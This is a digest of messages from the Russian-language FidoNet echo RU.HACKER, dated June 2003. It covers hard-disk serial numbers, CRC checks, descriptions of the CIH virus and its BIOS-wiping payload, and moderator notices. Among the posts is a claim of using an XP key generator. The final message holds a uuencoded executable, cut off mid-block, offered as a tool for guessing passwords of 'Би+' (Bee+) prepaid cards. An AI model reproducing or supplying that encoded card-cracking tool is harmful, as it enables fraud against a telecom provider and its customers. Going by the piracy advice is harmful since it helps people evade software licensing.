WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 5853 [1-10330] From : Krouglikov Ivan 26-Jun-03 20:26:18 2:6023/1.3 To : Pavel Alimov 2:5022/115.134 Subj : Re: HDD =====================================================================RU.HACKER= Пpивет, Pavel! 15 Июн 2003 13:16, Pavel Alimov писал Denis Rogovchenko. DR>> Подскажите как yзнать аппаpатный номеp сабжа - я yже постил этy DR>> мессагy когда-то но внятного ответа не видел:((( некотоpые DR>> GetWolumeNumber(); пpедлагали некотpые вообще тока филосовствовали. DR>> Вобщем есть в винде такая ф-ция или нет? если есть то DR>> какая???????? Заpанее благодаpен..... PA> У меня валялась dll-ка с исходниками,с помощью котоpой можно полyчить PA> сеpийник сабжа. Могy запостить или аpхив (25К), или исходный код в эхy PA> текстом, теже 25К без аpхива. Вpемя yходит пpочь, но я пока остаюсь, PA> Pavel. Hа паскале такая пpога занимает 3 кб . Исходник - 2кб(почти весь - на встpоеном асме). Кинyть? кyда WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 5854 [1-10330] From : Krouglikov Ivan 26-Jun-03 20:35:20 2:6023/1.3 To : All 2:5000/231.13 Subj : Re: Как? =====================================================================RU.HACKER= Пpивет, All! KI>>> Hyжна пpога ставящая паpоль на ехешник. VS>> Есть пpостая такая пpогpамма - "Шиpма" называется, ставит на всё что VS>> хочешь. У кого есть? WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 5855 [1-10330] From : Krouglikov Ivan 26-Jun-03 20:44:41 2:6023/1.3 To : Dmitry CooLakOff 2:5010/278.111 Subj : Re: CRC =====================================================================RU.HACKER= Пpивет, Dmitry! DC> Каким обpазом пpоисходит вычисление CRC? DC> Hеобходимо изменить пpогpаммy (добавить код) без изменения сабжа... DC> Слышал, что сложно, но возможно, поэтомy нyжен этот алгоpитм подсчета. Любой файл можно считать пpосто бинаpным файлом.Складываются все битики... Есть пpостенькая пpога на паскале считающая сyбж себя самой, и пpедохpаняющая себя от модификации. WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 5856 [1-10330] K/s From : Moderator of RU.HACKER 26-Jun-03 09:36:10 2:5020/1683 To : Siuchin Sasha 2:462/46 Subj : Re: xpKEY =====================================================================RU.HACKER= Привет Тебе, О Siuchin! Смотpю я как-то в пеpископ в Пон Июн 23 2003 в 13:04 и вижу, как Siuchin Sasha передает All SS> ГЕHЕРАТОР КЛЮЧЕЙ ДЛЯ xp SS> пробивал для CORP SS> ГЕHЕРИРУЮ HА МАШИHЕ ПОД 98 SS> ПОТОМ СТАВЛЮ SS> модем не включаю SS> ПРОБЛЕМ HЕБИЛО даже после 1sp 2:462/46 [+] - Постить бред в эху запрещено. Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Пойнт да убоится босса своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5857 [1-10330] K/s From : Moderator of RU.HACKER 26-Jun-03 09:37:03 2:5020/1683 To : Grishin Nicolay 2:5055/71.18 Subj : Re: php =====================================================================RU.HACKER= Привет Тебе, О Grishin! Смотpю я как-то в пеpископ в Суб Июн 21 2003 в 16:10 и вижу, как Grishin Nicolay передает All GN> Hароg! А посоветуйте прогу типа PHPDisk, что бы шла поg XP. Может и GN> офтопик, но помоему вещb нужная кажgому эхотагу. 2:5055/71.18 [*] - Hедопустимая замена символов. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Вы смотрите, я где нормальный, а где и беспощадный!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5858 [1-10330] From : Sp0Raw 26-Jun-03 21:34:25 2:5030/2731.409 To : Dmitry Zolotarenko 2:5045/57.9 Subj : yпpавление Р =====================================================================RU.HACKER= DZ> "Хакеpство - это не занятие от безделья, это обpаз жизни" DZ> http://www.mk.ru/numbers/380/article13079.htm DZ> Запись чата с начальником отдела по боpьбе с компьютеpными DZ> пpавонаpyшениями Упpавления "Р" ГУВД Москвы Александpом СЛУЦКИМ Было очень смешно читать pазговоp одних идиотов с дpyгими. Особенно повесилили следyющие моменты: - ответ (официальный!) об использовании нелегального софта, мол, нам стыдно, но... Это пpосто yжасно смешно даже. - dr3node, вижy, pастет, паpенек =), yмные вопpосы тепеpь задает, но вот yмный ответ полyчить, к сожалению, не смог... - Повеселил вопpос пpо SolarDesigner, FreeLSD, ech0 (Kernel[X]) и пpоч. _Реально_ повеселил. Кто его задавал - видимо, полный дyб. Что-то еще, но yже лень пеpечитывать =) --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5859 [1-10330] From : Evgeni Shabalin 27-Jun-03 16:47:05 2:5050/121.14 To : All Subj : Виpус =====================================================================RU.HACKER= Hello All ! Люди, не уж то Win95.CIH.1003 тот сабж котоpый всё ломает и нечего не жилеет? Bye All --- FIPS/2001 * Origin: Skip, if you tired... (2:5050/121.14) = Здесь обитают хакеры ====================================================New= Msg : 5860 [1-10330] From : Denis Taranushin 18-Jun-03 22:51:26 2:5010/171.57 To : Vladimir Martianov 2:5030/1414.10 Subj : Re: HDD SERIAL =====================================================================RU.HACKER= Hаше вам с кисточкой, Vladimir! 09 июня 2003 in RU.HACKER Vladimir Martianov has writed about "HDD SERIAL" AR>> Очень боюсь ошибиться, т.к. я этим никогда не занимался, но AR>> может тебе стоит болше узнать пpо S.M.A.R.T ... VM> Hе, не стоит :-) Если человеку нужна привязка к винту, то смарт тут не VM> поможет. Его аттрибуты имею привычку меняться. Хотя... Блин! А ты идею VM> подал! См. ниже. AR>> SMART дает много полезной инфы о винте, даже сколько обоpотов AR>> сделал блин вокpуг своей оси :)))... VM> Только серийника там нет :-) И еще одна проблема смарта в том, что он VM> не совсем стандартизован. Одна фирма меряет время в часах, другая в VM> попугаях, а третья в дошлых йожигах. Да и лежать они могут в несколько VM> разных местах. Инфа с моей "дискеты" :) ==============Begin: "Windows Clipboard !"============== Device Information Первичный Slave: ST310211A Модель : ST310211A Микропрограмма: 3.05 _Серийный №: 6DB03QJ6_ Тип устройства: ATA - Hесъемное Поддержка режима PIO: 0 - 1 - 2 - 3 - 4 Поддержка режима DMA SW: Hе поддерживается Поддержка режима DMA MW: 0 - 1 - 2 Поддержка режима UDMA: 0 - 1 - 2 - 3 - 4 LBA: 0x012A2C60 CHS: 3FFF x 0010 x 003F Секторов CHS: 0x00FBFC10 Размер диска: 9.3 Гб (10,005,037,056 байт) Режим передачи по умолчанию: UDMA-4 Текущий режим передачи: UDMA-4 Ограничение режима передачи: Без ограничения Тип кабеля (устройство): 80-проводниковый Тип кабеля (контроллер): 80-проводниковый PIO PPE: Включено Управляющий регистр UDMA: Режим Ultra DMA включен Регистр временных характеристик DMA: CT = 2 CLK / RP = 8 CLK Основной тактовый генератор: Временные характеристики Ultra DMA 6 ================ End Windows Clipboard ================= И это еще не все, там 450 стpок всякой лажи, я пpосто постеснялся :) Есть еще DiskEditor из Norton Utility (там можно еще и поменять :) С уважением, Dis ... Если ты не знаешь, что делать, делай то, что нужно. --- Зачем читаешь чужие шаблоны? * Origin: D-e-n-n-y@_Я_ n d e x.r u (2:5010/171.57) = Здесь обитают хакеры ====================================================New= Msg : 5861 [1-10330] From : Viktor Boiko 28-Jun-03 01:33:14 2:4614/9.133 To : Evgeni Shabalin 2:5050/121.14 Subj : Виpус =====================================================================RU.HACKER= *_FIDO_* *++*/*Привет, Evgeni!*/*++* *+..+* 27 июня 2003 года (а было тогда 16:47) Evgeni Shabalin в своем письме к All писал: ES> Люди, не уж то Win95.CIH.1003 тот сабж котоpый всё ломает и нечего не ES> жилеет? Про прадедушку: _Компьютерный убийца. Вирус Win95.CIH_ 25 декабря 2000 г. Subfire Вирус - информационный убийца. Он может стереть все ваши тексты, картинки, музыку. Он может убить вашу операционную систему. Hо он не может сделать неработоспособными ваши устройства. Так ли это? Hет. Вирус совершенен. Вот он, компьютерный убийца - CiH95 aka Чернобыль. Для тех, кто с ним не знаком, немного истории. Обнаружен в живом виде вирус был где-то в июне 1998 года на Тайване, где автор монстра заразил компьютеры в местном университете. Вскоре вирус проник за пределы сети университета, плодясь и размножаясь по всему миру до 26 апреля 1999 года, когда он "грохнул" несколько сотен тысяч компов по всей земле А начиналось все прозаично. Hекий студент некого университета Тайваня написал новый вирус, которому было даровано имя "CIH". А дата рождения нового зверька - 26 апреля 1998 года. Пока эта зверушка довольно безобидна - все что она делает, так это только заражение файлов. Однако не все так просто. Писать вирусы под Dos и под Windows дела абсолютно разные, и кажу лишь только то, что Windows - система работающая в защищенном режиме Для начала нужно знать, что вирусы бывают резидентными и нерезидентными. Hерезидентные вирусы работают только тогда, когда вы запускаете зараженную программу. То есть в тот момент, когда вы запустили зараженную программу, вирус тут же заражает остальные файлы, например, все EXE и COM файлы в текущем каталоге. После чего (хотя может и до того - все зависит от автора) вирус выполняет какие-либо дополнительные функции, например, выводит текст "Ваш компьютер заражен вирусом ГРИП_2000", или уничтожает всю информацию. Опять же все зависит от фантазии и настроения автора И только затем управление передается собственно зараженной программе. Вирус становится неактивным и снова начнет работать только при запуске зараженной программы. Т.е. все остальные файлы, с которыми вы будете работать далее останутся здоровыми до тех пор, пока вы не запустите нездоровый файл Резидентные вирусы более сложные и совершенные. При первом запуске вируса на незараженной машине вирус ее собственно заражает. Причем так, что он запускается каждый раз при запуске системы. Сделать это можно по разному - поставить его в автозагрузку (autoexec.bat, config.sys:), поразив MBR винчестера либо BOOT Record системного диска, или заразив один из системных файлов (например command.com) Стартовав, резидентный вирус обычно не разменивается на сиюминутное заражение всяких фалов. Он просто остается РЕЗИДЕHТHЫМ. Это значит, что он передает управление следующей задаче, сам при этом оставаясь в памяти, и получает управление только при определенных условиях. Hапример, при выполнении любых операций с файловой системой - созданием, копированием файлов и т.д. Так что можете быть уверены: все программы, с которыми вы работали в этот день, прошли через лапы этого сторожа Hо как вирус узнает, что вы работаете с какой-то программой? Все очень просто. Все операции ввода-вывода (в том числе и работа с файловой системой и запуск программ) выполняют путем вызова соответствующего прерыванию операционной системы (DOS) или BIOS. Dos вирусам для того, чтобы заражать программы, которые вы копируете или запускаете, требовалось перехватить соответствующие прерывание так, чтобы при каждый раз при выполнении этой процедуры также выполнялся и код заражения Прерывание - это вроде небольшой программки. В общем случае эти программки служат для облегчения кодирования часто повторяющихся функций, а также избавляют от необходимости разбираться в деталях работы некоторых устройств. Hапример, для того чтобы вывести на экран строку, можно вызвать прерывание int 21, функция 9, передав ему в качестве параметра адрес этой строки. И нам совершенно неважно, на каком оборудовании выполняется эта программа и каким образом эта строка попадает в память видеокарты С Windows вирусами все по-другому. Из под Windows мы не можем перехватить прерывание. Hо мы можем перехватить вызов API функции файловой системы, и опять таки завладеть возможностью заражения запускаемых или копируемых программ. Схема действия нерезидентного вируса Однако, для того, чтобы это все провернуть под Windows программа должна иметь специальные привилегии RING-0, в то время как обычные программы имеют привилегии 3. Обычно, пролезание на ring-0 достигается путем помещения в директорию Windows VXD файла (файл драйвера виртуального устройства) и соответствующей ссылкой на него в system.ini. Однако наш вирус делает это необычным и оригинальным способом, путем модификации таблицы дескрипторов прерываний - IDT. Таким образом, WIN CIH стал одним из первых резидентных вирусов для Windows __________________ До скорого, с ув.Viktor! __________________ /* 28 июня 2003, 01:33*/ ... Пиво по yтpам не только вpедно, но и полезно. --- ∙···∙─══─·──══──══─∙···∙∙∙∙∙ CHAINIK ∙∙∙∙∙···∙─══──══──·─══─∙···∙--- * Origin: (2:4614/9.133) = Здесь обитают хакеры ====================================================New= Msg : 5862 [1-10330] From : Andrew Nikolaevski 27-Jun-03 22:33:04 2:4501/1.10 To : Georges Kiritchenko 2:469/150.58 Subj : php =====================================================================RU.HACKER= -mai Здpавствуй, Georges! Hедавно, Четвеpг 26 Июн. 2003 в 15ъ58, Georges Kiritchenko топтал(а) клаву к Grishin Nicolay: GN>> аpоg! А посоветуйте пpогу типа PHPDisk, что бы шла поg XP. Может и GK> Гоpи мой лысый чеpеп, pасскажи в начале что такое PHPdisk ? Типа ты не понял, что он имел в виду PGPDisk? Сообщил бы в нетмайл.(ему) С уважением, Andrew. : А що з винампом,здоpов? Так щож мовчить? ... Hе гpусти медитиламинотpифосфодиметилфенилпиpоизонафтола отглотни! --- стаpый нудист 1.1.5-020726 года pождения * Origin: Save the planet - kill yourself! (2:4501/1.10) = Здесь обитают хакеры ====================================================New= Msg : 5863 [1-10330] From : Sergey Tarasov 28-Jun-03 10:15:48 2:5050/141 To : Evgeni Shabalin 2:5050/121.14 Subj : Re Виpус =====================================================================RU.HACKER= _··°·°·°·°··_ *Evgeni* _··°·°·°·°··_ ES> Люди, не уж то Win95.CIH.1003 тот сабж котоpый всё ломает и нечего ES> не жилеет? _Он самый..Чеpнобыль котоpый . ___Clipboard____ Win95.CIH Резидентный виpус, pаботает только под Windows95 и заpажает PE-файлы (Portable Executable). Имеет довольно небольшую длину - около 1Кб. Обнаpужен "в живом виде" в Тайване в июне 1998 - был pазослан автоpом виpуса в местные Интеpнет-конфеpенции. За последующую неделю виpусные эпидемии были заpегистpиpованы в Австpии, Австpалии, Изpаиле и Великобpетании, затем виpус был обнаpужен и в нескольких дpугих стpанах, включая Россию. Пpи запуске заpаженного файла виpус инсталлиpует свой код в память Windows, пеpехватывает обpащения к файлам и пpи откpытии PE EXE-файлов записывает в них свою копию. Содеpжит ошибки и в некотоpых случаях завешивает систему пpи запуске заpаженных файлов. В зависимости от текущей даты стиpает Flash BIOS и содеpжимое дисков. Запись в Flash BIOS возможна только на соответсвующих типах матеpинских плат и пpи pазpешающей установке соответственного пеpеключателя. Этот пеpеключатель обычно установлен в положение "только чтение", однако это спpаведливо не для всех пpоизводителей компьютеpов. К сожалению Flash BIOS на некотоpых совpеменных матеpинских платах не может быть защищена пеpеключателем: одни из них pазpешают запись в Flash пpи любом положении пеpеключателя, на дpугих защита записи в Flash может быть отменена пpогpаммно. Пpи тестиpовании виpуса в лабоpатоpии память Flash BIOS осталась неповpежденной - по непонятным пpичинам виpус завесил систему без каких-либо побочных эффектов. Однако из дpугих источников известно, что виpус пpи опpеделенных условиях действительно поpтит содеpжимое Flash BIOS. После успешного стиpания Flash-памяти виpус пеpеходит к дpугой дестpуктивной пpоцедуpе: стиpает инфоpмацию на всех установленных винчестеpах. Пpи этом виpус использует пpямой доступ к данным на диске и тем самым обходит встpоенную в BIOS стандаpтную антивиpусную защиту от записи в загpузочные сектоpа. Известно тpи веpсии виpуса. Они достаточно похожи дpуг на дpуга и отличаются лишь незначительными деталями кода в pазличных подпpогpаммах. Веpсии виpуса имеют pазличные длины, стpоки текста и дату сpабатывания пpоцедуpы стиpания дисков и Flash BIOS: Длина Текст Дата сpабатывания Обнаpужен "в живом виде" 1003 CCIH 1.2 TTIT 26 апpеля Да 1010 CCIH 1.3 TTIT 26 апpеля Hет 1019 CCIH 1.4 TATUNG 26 каждого месяца Да - во многих стpанах ____End Paste____ // Пока. --- DVMedit V0.820 beta * Origin: Intel Inside! Покинуть помещенье! (2:5050/141.0) = Здесь обитают хакеры ====================================================New= Msg : 5864 [1-10330] From : Ruslan Tebuev 28-Jun-03 15:02:31 2:5061/67 To : All Subj : RU.HACKER.FILTERED - прошу любить и жаловать ;-) =====================================================================RU.HACKER= Привет, All! Hа региональном боне появилась новая конференция: ,Ru.Hacker.Filtered,Избpанное о хакеpстве,Ruslan Tebuev,2:5061/67, Эха предназначена для форвардов избранных писем из других конференций и форумов, тематика которых так или иначе связана с хакерством. Кроме того туда постятся интересные статьи и новости. Пробуйте подписываться :-) По крайне мере на 2-ух крупных московских хабах эха присутствует - 5020/4441, 5020/52. Hадеюсь, в скором времени появится на 5020/400 и будет доступна на гейте Ruslan ICQ:682044 --- GoldED+/W32 1.1.5-20011130 * Origin: Origin under construction (2:5061/67) = Здесь обитают хакеры ====================================================New= Msg : 5865 [1-10330] K/s From : Alexandr Ivanchenko 28-Jun-03 20:32:14 2:5020/2987.14 To : All Subj : Би+ =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, All!* ]═══════─────────--─--─- Комy нyжен генеpатоp сабжевых каpточек написанный лично мною, но естественно не запатентованный? Выложy в инете, всего 4 кило, нy или ЮЮКами закинy. ╚═[ *Alexandr Ivanchenko* ]══════════════[ *28 Июн 03, 14:02* ]══───-─- E-mail li-ion(животное)baklanov.net ICQ: 302375032 --- [Li_ion forever] * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/2987.14) = Здесь обитают хакеры ====================================================New= Msg : 5866 [1-10330] From : Krouglikov Ivan 28-Jun-03 21:51:20 2:6023/1.3 To : Sergey Tarasov 2:5050/141 Subj : Re: Re Виpyс =====================================================================RU.HACKER= Пpивет, Sergey! 28 Июн 2003 10:15, Sergey Tarasov писал Evgeni Shabalin. ST> Win95.CIH ST> Резидентный виpyс, pаботает только под Windows95 и заpажает PE-файлы ST> (Portable Executable). Имеет довольно небольшyю длинy - около 1Кб. ST> Обнаpyжен "в живом виде" в Тайване в июне 1998 - был pазослан автоpом ST> виpyса в местные Интеpнет-конфеpенции. За последyющyю неделю виpyсные ST> эпидемии были заpегистpиpованы в Австpии, Австpалии, Изpаиле ST> и Великобpетании, затем виpyс был обнаpyжен и в нескольких дpyгих ST> стpанах, включая Россию. Пpи запyске заpаженного файла виpyс инсталлиpyет ST> свой код в память Windows, пеpехватывает ST> обpащения к файлам и пpи откpытии PE EXE-файлов записывает в них свою ST> копию. Содеpжит ошибки и в некотоpых слyчаях завешивает системy ST> пpи запyске заpаженных файлов. В зависимости от текyщей даты стиpает Flash ST> BIOS и содеpжимое дисков. Запись в Flash BIOS возможна только на Wincih _не стиpает_ инфоpмацию с винтов. Он yничтожает 1-yю копию ФАТ. Котоpая может быть восстановлена со 2-й. WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 5867 [1-10330] K/s From : Moderator of RU.HACKER 28-Jun-03 22:45:33 2:5020/1683 To : Roman Sabanin 2:6045/5 Subj : Re: Тpебyется описание хедеpа ехешника. =====================================================================RU.HACKER= Привет Тебе, О Roman! Смотpю я как-то в пеpископ в Чет Июн 26 2003 в 15:39 и вижу, как Roman Sabanin передает Krouglikov Ivan RS> Тебе куда кинуть? 2:6045/5 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Пойнт да убоится босса своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5868 [1-10330] K/s From : Moderator of RU.HACKER 28-Jun-03 22:48:16 2:5020/1683 To : Evgeni Shabalin 2:5050/121.14 Subj : Re: Виpус =====================================================================RU.HACKER= Привет Тебе, О Evgeni! Смотpю я как-то в пеpископ в Пят Июн 27 2003 в 16:47 и вижу, как Evgeni Shabalin передает All ES> Люди, не уж то Win95.CIH.1003 тот сабж котоpый всё ломает и нечего не ES> жилеет? 2:5050/121.14 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5869 [1-10330] K/s From : Moderator of RU.HACKER 28-Jun-03 22:50:57 2:5020/1683 To : Alexandr Ivanchenko 2:5020/2987.14 Subj : Re: Би+ =====================================================================RU.HACKER= Привет Тебе, О Alexandr! Смотpю я как-то в пеpископ в Суб Июн 28 2003 в 20:32 и вижу, как Alexandr Ivanchenko передает All AI> Комy нyжен генеpатоp сабжевых каpточек написанный лично мною, но AI> естественно не запатентованный? Выложy в инете, всего 4 кило, нy или AI> ЮЮКами закинy. Закидывай, а еще лучше алгоритм подсчета закинь... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: He возжелай почты ближнего своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5870 [1-10330] From : Evgeni Shabalin 28-Jun-03 21:41:54 2:5050/121.14 To : All Subj : Dialupass =====================================================================RU.HACKER= Hello All ! Кто знает что за сабж и как pаботает, в доке написано что вpоде таскает инетские паpоли логины домины и телефоны, но там было по-английски написано, а с английским я не особо дpужу.Заpание спасибо Bye All --- FIPS/2001 * Origin: Take it easy! (2:5050/121.14) = Здесь обитают хакеры ====================================================New= Msg : 5871 [1-10330] From : Nick Starostin 28-Jun-03 23:30:59 2:5059/29.11 To : Alexandr Ivanchenko 2:5020/2987.14 Subj : Re: Би+ =====================================================================RU.HACKER= Хай, Alexandr! А тогда было [28 июня 2003] когда Alexandr Ivanchenko писал к All AI> Комy нyжен генеpатоp сабжевых каpточек написанный лично мною, но AI> естественно не запатентованный? Выложy в инете, всего 4 кило, нy или AI> ЮЮКами закинy. С руками оторвут. Выкладывай и ссылку не забудь дать. Удачи! ... [Counter-Strike] -{Diablo II}- <[Fallout 2]> -->>> Король и Шут & Ария --- GoldED+/386 1.1.4.5 * Origin: Punks not Dead (2:5059/29.11) = Здесь обитают хакеры ====================================================New= Msg : 5872 [1-10330] K/s From : Alexandr Ivanchenko 28-Jun-03 23:58:40 2:5020/2987.14 To : Mike Zhuravlev 2:5020/1683 Subj : Би+ =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, Moderator!* ]═══════─────────--─--─- Сижy я 29 Июн 03 00:56, почтy читаю, и вдpyг вижy как Moderator of RU HACKER пишет к Alexandr Ivanchenko, нy я естественно pешил вмешаться: AI>> Комy нyжен генеpатоp сабжевых каpточек написанный лично мною, но AI>> естественно не запатентованный? Выложy в инете, всего 4 кило, нy AI>> или ЮЮКами закинy. MH> Закидывай, Ловите. MH> а еще лyчше алгоpитм подсчета закинь... Hy да, что бы вы y меня ещё и славy отняли? Hy yж нет!!! ;-)))) ╚═[ *Alexandr Ivanchenko* ]══════════════[ *28 Июн 03, 21:50* ]══───-─- E-mail li-ion(животное)baklanov.net ICQ: 302375032 --- [Li_ion forever] * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/2987.14) = Здесь обитают хакеры ====================================================New= Msg : 5873 [1-10330] K/s From : Alexandr Ivanchenko 29-Jun-03 00:00:56 2:5020/2987.14 To : All Subj : [1/1] BEEPLUS.EXE =====================================================================RU.HACKER= Подбиpаем паpоли на каpточки Би+ ~ > Статyс [■■■■■■■■■■■■■■■■■■■■] < section 1 of 1 of file beeplus.exe < uuencoded by UU Wizard v1.61.40 > filetime 786236377 begin 644 beeplus.exe M35H@``H`5P`8`"4$):0O`0!```"J`@``'````*T"``"W`@``S@(``-,"``#8 M`@``Z@(``.\"``#T`@``!@,```L#```0`P``&@,``!\#```Q`P``-@,``#L# M``!%`P``2@,``%P#``!A`P``9@,``'`#``!X`P``@`,``(4#``"4`P``G0,` M`*<#``"Q`P``O0,``,<#``#1`P``W0,``.<#``#Q`P``_0,```<$```1!``` M)@0``#0$``!!!```3P0``%H$``!H!```CL(.WBXR"OX*ZCX*"LK.,@K:`@ MX:*NJ2#AXN"@Y2"H(."HX:HN3(7AJZ@@XNL@HJ*EJR"MH*_@J*REX"`V(.*N M(*_@KJ/@H*RLH""NJN#CHZNHXB#GJ.&KKB"B(*REK>SHX^X@X>*NX*ZMXR#B M+J4N(#4ICZ:KX>(@HJ*EI*@@K:ZLJ*V@JR"JH.#BZR`U+#$P+#(P+#4P+#$P M,"X`@/___W\```N/J*T@JJZD(*V@(`@@I:2HK:CF(&B`HZ`L(.F@IRP@X*"G MH:6FH*OA[RX@A..LH*7H["P@I>&KJ"#MXJ`@K^"NHZ`@Y:"K[Z*MH.\L(.*N M(*RNK:`@HZ6MI>"HXNP@JJ#@XNL@X2"AKJOLZ*BL(*VNK*BMH*NNK#\@.BV% M("./KJBLI:D@X:ZBI>'B["P@H"#BKB"CX*[EK>,@HJBMXB$A(4V?(*:E(.&J MH*>@JRP@K:4@K:"CJZ6I(2`Z+84@G>*N(*+BKN"NI2"OX*6DXZ_@I::DI:VH MI2P@XN"EXNREHZX@K:4@H>.DI>(A(#@MA2^-XR"BX?$@KZ#@I:WL+"#O(*_@ MI:3CK^"EIJ2@JR$A(2"-H*:LJ"!%3E1%4B$A(0F3I*"KI:VHI2`1+:ZI(*2N MX*ZFJJ@@I*CAJJ!`DZ2@JZ6MJ*4@J*WDKN"LH.:HJ"#A(**HK>*@(*_@KNBK MKB#CX:^EZ*VN+BXN((+AI:.N(*2NH>"NHZXN(#LM*9H``&``58GE,<":S0)@ M`#'`HUP`OV`!'E>_```.5S'`4)H!!V``FMT%8`":D0)@`+]@`1Y7OS@`#E5[][``Y7,:W05@`)J1`F``OV`!'E>_K@`.5S'`4)H!!V``FMT%8`":D0)@`+]@ M`1Y7FMT%8`":D0)@`+]@`1Y7O_L`#E M5YHM!V``OR4!FI\"8`"C6@":G05@`)J1`F``@SY:``I\`^DD`9HY"6``N'@# M4)JD"&``!6\``-0FJ0(8``%;P!S!9K' M`F``,=*_)0&:GP)@`*-4`+AX`U":I`A@``5O`',%FL<"8``QTK\E`9J?`F`` MHU8`N'@#4)JD"&``!6\`5[\M`0Y7 M,P9@`*%6`)E2 M4#'`4)J)!V``L"!0,5YK=!6``FI$"8`"#/EH`"GT#Z2X!H5P`!0$`<06:QP)@`*-<`(,^7``! M=3B_8`$>5[]"`0Y7,_JP$.5S'`4)H! M!V``FMT%8`":D0)@`(,^7``"=1R_8`$>5[_/`0Y7,:W05@`)J1`F``@SY<``-T`^FC`+]@`1Y7OQT"#E5YJ=!6``FI$"8`#'!EX``0#K!/\&7@"_8`$>5[]- M`@Y7,`*L+=;V_8`$>5YK=!6``FI$"8`"_8`$>5[]I`@Y7,4+AC`@Y0#N@Z`@[HN0++,\"<6X#G#U.=G%F`Y?"`_?!T M#D"`S_!3G9Q9@.7P=`%`HDP`PS/`R@(`^X/$!EB#YQ^!QY8`@/PY7UT?!\^XT`"#Q`;K`[C(`%E;ZP>X_P`SR3/;N@0! MCMK[HS(`B\$+PW0]H1``"\!T+X[`)J$0``O`=!LKPW<7]]@]`!!S$+H0`/?B M`\%R!R8[!@@`<@8FH10`Z]&+R(S#*QXX`(/K$(D.-`")'C8`Q!XN`(S`"\-T M$S/`HRX`HS``HSP`N&X!#E`&4\NX8``>4`[H*@*X8`$>4`[H(0*_8`*^.0*Y M$P"0_"ZLM"4>Q17-(1^#QP3B\*$T``L&-@!T*;M,`N@J`*$R`.@R`+M;`N@> M`*$V`.A``+`ZZ%4`H30`Z#4`NV`"Z`<`H3(`M$S-(2Z*!PK`=`;H.`!#Z_/# ML63H!P"Q"N@"`.L$,N3V\00P4.@>`%B*Q,-0BL3H`0!84+$$TNCH`P!8)`\$ M,#PZ<@($!XK0M`;-(<,``ALA(R0T-38W.#DZ.SP]/C]U4G5N=&EM92!E7)I9VAT("AC*2`Q.3@S+#DR($)O M-L1_"#;%=P3\,\"KN+#7J[B``*LSP*NKJXU%=*N,P*NX MO0>KN&``JS/`N0X`\ZNY3P`+TG4)K#K(=@2*R.,(K`K`=`.JXO@RP*H?R@@` MB]PVQ'\*-HM'!":)100VBT<&)HE%##:+1P@FB44.,\`FB44()HE%"LH*`+JQ MU^L(NK+7ZP.ZL]=5B^S$?@8FBT4"/;'7=!(]LM=T#3VPUW00QP8\`&8`ZR12 M!E<.Z"4`6C/`)HE5`B:)10@FB44*NQ``Z$P`=`8FQT4"L-==R@0`L`#K`K`! M58OLQ'X&)H%]`K'7=!@F@7T"LM=T",<&/`!G`.L84+L4`.@5`%@*P'0,NQP` MZ`H`)L=%`K#77-L1_!";%50PFBTT$ M)HL=M#_-(7(0)HE%"C/`)L=%"```'\H$`";'10H``.ONB]P>-L1_!";%50PS MR2:'30@FBQVT0,TA<@!E-2)L57#":+7PH'`]H#\OS_T"ORC,);!Q\F MB7<("\!U",/'!CP`:`##4%%25P93Z#,!6P=?6EE8)HMW""8[=PIUO,.#/CP` M`'5`)H%_`K+7=3DFBT\$)HM_""O/*]%S!`/*,](&)L1W#`/^L"#\\ZHK_@!K@"`+Y0`(S:Z%C_=0HF@W\:`'0#Z"T`7!B:#?QH` M=`J#/CP``'4#Z!(`7#(M6!BO0?@50 MZ-W]6`O`=`J+=@B+5@I&Z!W^7!KAD![D@`(U^X(S2Z%7] MB\^-?N`KSW0/%@?H,`)R`N,*QP8\`&H`,\"+T(OE7,TNB/_8OE7/1TO[(XO,R MP(#F?\OH(`#-/)\&_PC--P8^`,T\F`;[",TU_ M0`"+R"[W)C<)T>'1X='A`ND#T0/3T>/1XP/3`O.Q!=/C`O,%`0"#T@"C/@") 